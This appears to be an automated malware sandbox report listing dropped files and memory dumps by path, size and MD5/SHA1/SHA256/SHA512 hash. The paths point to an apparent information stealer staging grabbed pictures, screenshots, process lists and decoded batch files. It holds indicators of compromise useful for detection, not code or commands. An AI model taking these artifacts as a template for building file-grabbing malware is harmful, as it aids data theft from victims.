ec3ead9bcae6a7daed785b94b19bea55a704d0d27c84c7a5e14c24bc6a147c9e

SHA512
d9dc30b43a5d81c7da6fe4ebc4225f1d1d47a3fc0b6a83457abfbd2780762c545e66679e55a5e7ca84621a2f8bd0f07e9c34033e99e416dff41dacd20259bf4d

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Pictures\RedoCopy.jpg

Filesize
508KB

MD5
622bec67ec81afaf451905a7ff5d89b2

SHA1
546f871bc6994a05c1a919e3071fae941a6d4a6f

SHA256
53b7eecb0d8bdd5747a46eec9eaef7ed9142802ea321fae6a827f27c8dd1bc3c

SHA512
0df07848cba56c5795c2848de52a6354f1f8cbe2b8efd3afbe2509e014a03a0b551b33a0fd9fc97ca184f292dc97adeda02b76b4eecae4026f60a09e7945fb7d

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Pictures\RedoRevoke.svg

Filesize
486KB

MD5
71b58f6435558138d11342f77c79e6b6

SHA1
71e1249e0a753b31895c8c1fe1f61bf3ea110e1f

SHA256
c7327543d5893ced915075cdcdb952cae23126589ca3c9a18ca4f357a57a431b

SHA512
f9bf38c4468c3e2646337540b356493fe77765d000020d83b7f9067460121ce1c52bc844c7ce0047c710a6c0caca0f0228f7c2755eb17d2dc6060c3b390ef089

Download Submit
C:\ProgramData\QVLSXUFA\FileGrabber\Pictures\StopMeasure.jpg

Filesize
265KB

MD5
fe81766b646f0837c4bfbdad944ee0aa

SHA1
1c3bc05b85454cdbe215d49db321712e7132d9e2

SHA256
af11dc10b49575cc319e4b42722838e31037dbce6d995f428887d1b471636d69

SHA512
d0454681a63c8151a6dded5a8dc7f17fd8b5076130e80b2c4093ab2074a855f41a9dc81dd15445cfc75025c541fc778725f5e03731b70acb76f72fa02520c401

Download Submit
C:\ProgramData\QVLSXUFA\Process.txt

Filesize
4KB

MD5
54eb92fd01c04ea18a72f3e49cb040d7

SHA1
4f768b5ba7360b9c1d8401beea2b840889b8e007

SHA256
8ae0c4ceb7b70e02a2f82647caa5fc49ec3797eeb0f61c31ffadcb53ad7a77c6

SHA512
695f3574ef0d928913925282a71e9b8b8d2d89f45b4540cfdb09123613c42a37a775fc88564a6df675182f05fba38e3727fbff8c24a74ca3a0b31f557eaf858b

Download Submit
C:\ProgramData\QVLSXUFA\Screen.png

Filesize
208KB

MD5
17d1fdeab2e77410588723cb833d503a

SHA1
29f0b73489b39d5fb96bf6d0f22b5c4d372f2417

SHA256
905dbebe7a053775a96ced01e1dfa4fc713b2df00d001b9e5a0df15ce64e3088

SHA512
0afb1bd517d6af24d75cc26651035fa790223688133fe548065caa02c88aa871f4f44b04144460e079659f5754cd46fc748d8a5cd87932b76b3d2339001a0582

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
adffebb00ef4571807c1eaa09f614b4e

SHA1
ab2064ba1a0e91a90fdead54026a1fafb61ea82a

SHA256
404fbe22a5da7dc4cb683fba5661598ed1e5517ed0c46a0016cf5f94fc199cd3

SHA512
3e40c76ae7f0e69906a3bddd34bb20213853b914f880b39ba3caa8d49cd1959e4f277ea68f1e67e47c5b211308b0ff9271b5ee1768dc02b4ae63be58a263e1d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
08f9f3eb63ff567d1ee2a25e9bbf18f0

SHA1
6bf06056d1bb14c183490caf950e29ac9d73643a

SHA256
82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0

SHA512
425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9bcccf1f145d1c4621cb278f967320ab

SHA1
257c578b5eaa534497d7521a482523425825bafd

SHA256
4ee7e2ed5b8e30474a36953bfd4736558ad1787749ecc6b18ce1384eaa703c50

SHA512
7b7674458bb6c5e8a8c788bc66855d381aa294313638b10b2f560b0de9b2fe8fba0c1f24a9897a5d493b41338a224728549cfcae7675966942d239b00ec5647d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
4ac6377200bb1506a9af9444e720cb94

SHA1
3bde37b56ebc1b7badb4889abc9aa55f0c3159d0

SHA256
84a068ddbc70c22b0ba0eb4bee649e1631b2e7ac7594d714e42a1f802ddb56c4

SHA512
c78ee036f2f1b5bbb41d754e19a6b68380a91b641b60df6a2ac7e61b3b9726c30a63fb874c1707eb7fd97bdbf4c632a63e6c86d06aa5d4806decce27b9e74b94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
224dcf4c17389871fa59fe45c7acd94a

SHA1
d02998277a18745bc5a5209d80a4d5c5077772ff

SHA256
c10c307786cba93488fb258b288490207e01024028a4340eab17f0c0b23dbb0e

SHA512
8e30a4a06f9a06dd2556ee9125e9dc9effcc1cbb3ce6ff9fabee383db8e4fdbe7f638ea71d5a42d6722748543c8f2a4399baefdd2a2cc20e531c966b29f32e10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
356bdb6eb65d440f94d1980abd0f9f03

SHA1
40cce25e1bdbc9490d26b0db5a1cc0b61a6d8a15

SHA256
141c841056d68ab1528dbd19ee1a7fd2f1839256bedaf05c3bb43110e342559c

SHA512
4cf00d7a144ddf4a1869b259e6e55a33eb037e721a90af8d531802a259e71ae13019b84b1957ce2bce604d210c34cd917771b42b0c865f56a6af00b94dd81c5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\EZRA_TEMP\ctestx.txt

Filesize
2KB

MD5
ad24940eb1f75d4f04ebaf6812657fb5

SHA1
f0ee8bb82e11a0c997b044c6d2887ec4cb8d7f93

SHA256
c330aaaf72fc0cfcc57c281120543318e509c388c989f7f1e3c5be56851ecbf5

SHA512
6224960a3df722d8e2c247ef0a65eb10e53cb6380dcf416462689bb932876848fc9e623f18c4dc30c85d039246a85b1ed690fff5a1f99aeb6299ac9443e53eb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tls.bat

Filesize
6KB

MD5
d33c73445cbde9f6b1f05d117b2b69d1

SHA1
996e1a27d5ac674699498f2e790d1873dd27de5d

SHA256
fd3c3705088703b49b821dcd93e6006830c4cf87e520669082c58e1dd8ed72c7

SHA512
7ab42563ac3984672cffa34161a8662b491f8f6c8b07dde21ee0a6a968dabd2e9b10300f75d7104fc20cc32fe33d4ad849bdebb9ad02ae1d4f554895cb554779

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cnyheqg0.wlf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\screenshot.png

Filesize
192KB

MD5
04b7c207a9fef8acdd547ee247b549ca

SHA1
21da5d8be867504513c21690b2a99dd616f0d154

SHA256
41a0de89954e1813ef39211493955455a1b83e11a2950db04dd82aa2b858fbb9

SHA512
60200bcd597f75dd8b36ca9b68244d7b92334849d32964fbf3f79b8296d410b62ccc763838f3ac01aa58fecc1c7c44bae339b40dad7fac09c7b4b5d7c9a85a4c

Download Submit
C:\Users\Admin\Documents\encrypt.txt

Filesize
426KB

MD5
89e0ac409c43bd674874192e1ffbaee4

SHA1
dd347cf21abcfa773354bb8758c76a1265460b14

SHA256
b3375ebe8d87f78254ca93bbd3624b70fbee31135bd942fb4c197b17202e21d3

SHA512
9803ba65e5a4d70a51e5ec46f360250f3f783703c0090715d3b0c81a63528c4b9007eaa7e6a44db03ad64f3875e8be2f14e79c00d42652b1c08d4402fe7b7997

Download Submit
C:\Users\Admin\Documents\reconstructed.exe

Filesize
320KB

MD5
7c7cb8c5f0d143ca8f4505f833323a79

SHA1
86aeb690c0ba18c83b6f8bcd55e0d37f5ca838b5

SHA256
3875ab6f198df0b4388b2eaec822e49ad2e184cb0afdf3192b356cd7d9be35b4

SHA512
471a55263ff2ca1ee1791c2c7287424633945b5df72ee8c4ba003a2e65d605638761cfce560087f391db29a088a95667bd50702433e7d9d135be51244d4f48c1

Download Submit
C:\decoded.bat

Filesize
7KB

MD5
95f5e443d516292e66736152029a4a30

SHA1
5c437bafdfabaa1317e482c90690b18a95f040d9

SHA256
2d83f759816f0c9fdce6db71e0ae612a47370c701f1f49339d95d4d70d13ca90

SHA512
549c54846976e04d99f0cf2c13c49d624793a0143a52cdf7dcfe4b5d5c82d5920d5ccbf2972784f1e2a99636b7bbef5ce0ad4f17beb8bd14e83d3315ed8efc94

Download Submit
memory/3020-42-0x000001962D140000-0x000001962D668000-memory.dmp

Filesize
5.2MB

Download
memory/3020-41-0x000001962CA40000-0x000001962CC02000-memory.dmp

Filesize
1.8MB

Download
memory/4564-19-0x00007FF817AC0000-0x00007FF818581000-memory.dmp

Filesize
10.8MB

Download
memory/4564-15-0x00007FF817AC0000-0x00007FF818581000-memory.dmp

Filesize
10.8MB

Download
memory/4564-14-0x00007FF817AC0000-0x00007FF818581000-memory.dmp

Filesize
10.8MB

Download
memory/4564-9-0x000002147F400000-0x000002147F422000-memory.dmp

Filesize
136KB

Download
memory/4564-3-0x00007FF817AC3000-0x00007FF817AC5000-memory.dmp

Filesize
8KB

Download
memory/4656-150-0x0000000006D50000-0x0000000006DB6000-memory.dmp

Filesize
408KB

Download
memory/4656-148-0x0000000006E90000-0x0000000007434000-memory.dmp

Filesize
5.6MB

Download
memory/4656-147-0x0000000006840000-0x00000000068D2000-memory.dmp

Filesize
584KB

Download
memory/4656-117-0x0000000000B10000-0x0000000000B66000-memory.dmp

Filesize
344KB

Download